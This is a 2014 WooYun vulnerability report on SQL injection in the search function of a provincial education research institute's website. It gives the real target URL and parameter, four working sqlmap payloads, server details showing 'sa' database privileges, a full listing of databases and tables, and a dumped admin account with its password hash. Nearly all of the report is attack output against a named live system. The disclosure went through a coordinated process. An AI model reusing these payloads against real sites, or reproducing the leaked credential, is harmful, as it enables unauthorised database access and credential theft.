漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-078339
漏洞标题:某省教育科学研究院SQL注射(SA权限)
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2014-10-10 10:51
修复时间:2014-11-24 10:54
公开时间:2014-11-24 10:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-10-10: 细节已通知厂商并且等待厂商处理中
2014-10-14: 厂商已经确认,细节仅向厂商公开
2014-10-24: 细节向核心白帽子及相关领域专家公开
2014-11-03: 细节向普通白帽子公开
2014-11-13: 细节向实习白帽子公开
2014-11-24: 细节向公众公开
简要描述:
某省教育科学研究院搜索处存在SQL注射
详细说明:
注射点:http://www.sxsjky.com/Browse/NewsList.aspx?txtKeyword=a
---
Place: GET
Parameter: txtKeyword
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: txtKeyword=a%' AND 4761=4761 AND '%'='
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: txtKeyword=a%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(104)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(114)+CHAR(102)+CHAR(112)+CHAR(86)+CHAR(86)+CHAR(67)+CHAR(89)+CHAR(65)+CHAR(113)+CHAR(100)+CHAR(104)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: txtKeyword=a%'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: txtKeyword=a%' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user: 'sa'
Database: SY_WeiXinPlatform
[47 tables]
+---------------------------------------------------+
| account_info |
| activity_List |
| activity_Pool_info |
| activity_config |
| activity_model |
| activity_partake_info |
| activity_prize_info |
| annex_info |
| article_category_info |
| article_info |
| bidding_info |
| bus_pass_query |
| dic_entry |
| dic_type |
| dish_category_info |
| dish_info |
| file_info |
| import_records |
| keyword_fodder |
| keyword_info |
| micro_card_info |
| micro_card_msg |
| micro_card_temp |
| micro_card_type |
| msg_log_info |
| qrcode_info |
| shop_goods_info |
| shop_info |
| shop_special |
| sys_log_info |
| tea_category_info |
| tea_info |
| uc_notice |
| uc_organ |
| uc_permission |
| uc_resource |
| uc_role |
| uc_role_permission |
| uc_user |
| uc_user_profile |
| uc_user_role |
| userid_bankid |
| wx_fodder_manage |
| wx_group_info |
| wx_menu |
| wx_message_record |
| wx_user_info |
+---------------------------------------------------+
Database: xiaodian_web
[75 tables]
+---------------------------------------------------+
| cms_advertising |
| cms_advertising_space |
| cms_article |
| cms_article_attachment |
| cms_article_channel |
| cms_article_check |
| cms_article_count |
| cms_article_ext |
| cms_article_info |
| cms_article_pic |
| cms_article_tag |
| cms_article_tagrelated |
| cms_article_topic |
| cms_article_txt |
| cms_article_type |
| cms_article_video |
| cms_article_view |
| cms_channel |
| cms_channel_ext |
| cms_channel_txt |
| cms_channel_user |
| cms_chat |
| cms_chat_content |
| cms_chat_pic |
| cms_chat_user |
| cms_chat_video |
| cms_collect_opinion |
| cms_collect_theme |
| cms_comment |
| cms_config |
| cms_faq |
| cms_faq_category |
| cms_faq_members |
| cms_file |
| cms_flow_count |
| cms_info_config |
| cms_info_doc_catalog |
| cms_info_index |
| cms_info_matter_catalog |
| cms_info_open_apply |
| cms_info_open_catalog |
| cms_info_service_catalog |
| cms_links |
| cms_links_category |
| cms_model |
| cms_organ_duty |
| cms_organ_leader |
| cms_organ_type |
| cms_rss_subscription |
| cms_site |
| cms_template |
| cms_topic |
| cms_upload |
| cms_vote |
| cms_vote_item |
| cms_vote_record |
| hibernate_sequences |
| org_dept |
| org_dept_office |
| org_office |
| org_organ |
| org_user_office |
| org_vuser_office |
| os_log |
| os_properties |
| uc_group |
| uc_group_user |
| uc_operation |
| uc_privilege |
| uc_resource |
| uc_role |
| uc_role_privilege |
| uc_user |
| uc_user_privilege |
| uc_user_role |
+---------------------------------------------------+
Database: monitor
[3 tables]
+---------------------------------------------------+
| jc_infor |
| jc_notice |
| jc_wtjl |
+---------------------------------------------------+
Database: WangYaWebCmsV1
[17 tables]
+---------------------------------------------------+
| annex_info |
| article_category_info |
| article_info |
| dic_entry |
| dic_type |
| sys_log_info |
| sysdiagrams |
| uc_dept |
| uc_notice |
| uc_organ |
| uc_permission |
| uc_resource |
| uc_role |
| uc_role_permission |
| uc_user |
| uc_user_profile |
| uc_user_role |
+---------------------------------------------------+
Database: Sooyie_sxsjky
[32 tables]
+---------------------------------------------------+
| D99_Tmp |
| Duty |
| FileInInfo |
| Files |
| Help |
| HelpClass |
| ImageInInfo |
| Images |
| InfoApply |
| InfoClass |
| InfoIndexID |
| InfoMatter |
| InfoPublic |
| InfoService |
| InfoTag |
| InfoType |
| Intro |
| Link |
| Log |
| Message |
| Organ |
| Permit |
| PermitInRole |
| Placard |
| TagInInfo |
| UserGroup |
| UserInGroup |
| UserInfo |
| UserProfile |
| UserRole |
| syscommand |
| sysdiagrams |
+---------------------------------------------------+
Database: msdb
[92 tables]
+---------------------------------------------------+
| MSdatatype_mappings |
| MSdbms |
| MSdbms_datatype |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfile |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtslog90 |
| sysdtspackagefolders90 |
| sysdtspackagelog |
| sysdtspackages |
| sysdtspackages90 |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profile |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_log |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysnotifications |
| sysoperators |
| sysoriginatingservers |
| sysoriginatingservers_view |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysschedules |
| sysschedules_localserver_view |
| syssessions |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers |
| systargetservers_view |
| systaskids |
+---------------------------------------------------+
Database: WeiXinMessageDB
[25 tables]
+---------------------------------------------------+
| annex_info |
| article_category_info |
| article_info |
| dic_entry |
| dic_type |
| notice_user_info |
| sys_log_info |
| sys_msg_info |
| system_info |
| uc_dept |
| uc_notice |
| uc_organ |
| uc_permission |
| uc_resource |
| uc_role |
| uc_role_permission |
| uc_user |
| uc_user_profile |
| uc_user_role |
| user_system |
| wx_account_info |
| wx_keyword_info |
| wx_menu_info |
| wx_record_info |
| wx_user_info |
+---------------------------------------------------+
Database: master
[290 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.credentials |
| sys.crypt_properties |
| sys.data_spaces |
| sys.database_files |
| sys.database_mirroring |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_connections |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_performance_counters |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_event_notifications |
| sys.server_events |
| sys.server_permissions |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.sql_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.syssegments |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+---------------------------------------------------+
Database: AwardMistakeV1
[27 tables]
+---------------------------------------------------+
| annex_info |
| article_category_info |
| article_info |
| dic_entry |
| dic_type |
| exchange_info |
| leave_msg_info |
| links_info |
| mistake_app_info |
| mistake_info |
| mistake_type_info |
| notice_user_info |
| sys_log_info |
| sys_msg_info |
| uc_dept |
| uc_group |
| uc_group_user |
| uc_notice |
| uc_organ |
| uc_permission |
| uc_resource |
| uc_role |
| uc_role_permission |
| uc_user |
| uc_user_profile |
| uc_user_role |
| web_user_info |
+---------------------------------------------------+
Database: SxUpWeiXinPlatformV1
[33 tables]
+---------------------------------------------------+
| activity_List |
| activity_Pool_info |
| activity_model |
| activity_partake_info |
| activity_prize_info |
| annex_info |
| article_category_info |
| article_info |
| dic_entry |
| dic_type |
| dish_category_info |
| dish_info |
| keyword_fodder |
| keyword_info |
| msg_log_info |
| shop_info |
| sys_log_info |
| tea_category_info |
| tea_info |
| uc_notice |
| uc_organ |
| uc_permission |
| uc_resource |
| uc_role |
| uc_role_permission |
| uc_user |
| uc_user_profile |
| uc_user_role |
| userid_bankid |
| wx_fodder_manage |
| wx_group_info |
| wx_message_record |
| wx_user_info |
+---------------------------------------------------+
Database: JkyWebCmsV1
[29 tables]
+---------------------------------------------------+
| Link |
| annex_info |
| article_category_info |
| article_info |
| case_class |
| case_info |
| course_info |
| dic_entry |
| dic_type |
| give_info |
| grade_info |
| lecturer_info |
| sys_log_info |
| sysdiagrams |
| tbl_province |
| uc_dept |
| uc_notice |
| uc_organ |
| uc_permission |
| uc_resource |
| uc_role |
| uc_role_permission |
| uc_user |
| uc_user_profile |
| uc_user_role |
| video_info |
| video_learned |
| video_record_info |
| video_user_info |
+---------------------------------------------------+
Database: JkyWebCmsV1
Table: uc_user
[12 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| dept_id | varchar |
| lay_order | int |
| user_create_date | datetime |
| user_id | varchar |
| user_is_locked | int |
| user_last_date | datetime |
| user_last_ip | varchar |
| user_login_num | int |
| user_name | varchar |
| user_pwd_encrypt | varchar |
| user_real_name | varchar |
| user_type | int |
+------------------+----------+
Database: JkyWebCmsV1
Table: uc_user
[1 entry]
+-----------+----------------+----------------------------------+
| user_name | user_real_name | user_pwd_encrypt |
+-----------+----------------+----------------------------------+
| admin | 超级管理员 | a78b5634eea2b34c25a1b6f1a1dad571 |
+-----------+----------------+----------------------------------+
漏洞证明:
见上
修复方案:
Null
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-10-14 16:49
厂商回复:
最新状态:
暂无